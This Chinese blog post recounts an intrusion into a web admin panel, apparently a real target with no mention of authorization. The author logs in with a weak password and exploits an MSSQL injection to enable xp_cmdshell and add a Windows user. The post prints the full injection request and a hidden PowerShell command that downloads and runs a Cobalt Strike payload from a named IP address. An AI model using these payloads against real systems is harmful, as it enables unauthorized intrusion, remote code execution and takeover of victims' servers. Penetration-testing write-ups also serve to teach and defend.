一次简单的web到上线

举报
亿人安全 发表于 2023/05/31 20:40:28 2023/05/31
【摘要】 title: 一次简单的web到上线date: 2021-08-29 08:36:04tags: - Web - 渗透测试categories: - 渗透测试comments: true渗透开始首先来到目标的后台看见这种很简陋 就感觉有洞 试了一下弱口令 靠 直接进了然后通过改包 也是可以登录的改包进来然后修改账户 发现这账号有点离谱然后就开始在后台找找能不能拿shell 的地方 导入的地方...
title: 一次简单的web到上线
date: 2021-08-29 08:36:04
tags:
 - Web
 - 渗透测试
categories:
 - 渗透测试
comments: true

渗透开始

首先来到目标的后台

看见这种很简陋 就感觉有洞 试了一下弱口令 靠 直接进了

然后通过改包 也是可以登录的

改包进来然后修改账户 发现这账号有点离谱

然后就开始在后台找找能不能拿shell 的地方 导入的地方可以上传文件

但是只能上传excel文件

尝试改文件后缀 结果失败了 然后继续找其他突破口

这里有个查询的地方 然后开启抓包 因为这种查询的地方很有可能是带有参数查询的 就可能含有注入

好家伙 这注入不久来了嘛 mssql的

直接dba的权限 尝试cmdshell

通过下面sql语句开启 xpcmd sp_configure ‘show advanced options’, sp_configure ‘xp_cmdshell’,1

尝试ping dnslog


是出网的 直接尝试添加 账户 上3389

selstate=0&numState1_5=&Remarks2=&number=1’; exec master ..xp_cmdshell ‘net user test1 test1 /add’ — &numState=%E5%85%A8%E9%83%A8&page=1&rows=500

扫端口发现3389是开的


然后直接连 发

现连不上 添加到用户组


还是连不上 就先不管 直接上cs


powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://45.32.92.74:88/aa‘))”

因为存在引号这些 所以 直接编个码

直接复制到注入的地方

然后GO 坐等上线

好家伙 直接来了 杀软都没有

然后查看ip发现是内网 那刚开始3389连不上 应该就是这个情况 对方在内网 所以没连上

最后

因为这cs服务器没用了 所以就没打码了 师傅们轻点喷 如果我有说错的地方,师傅们 轻点喷

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。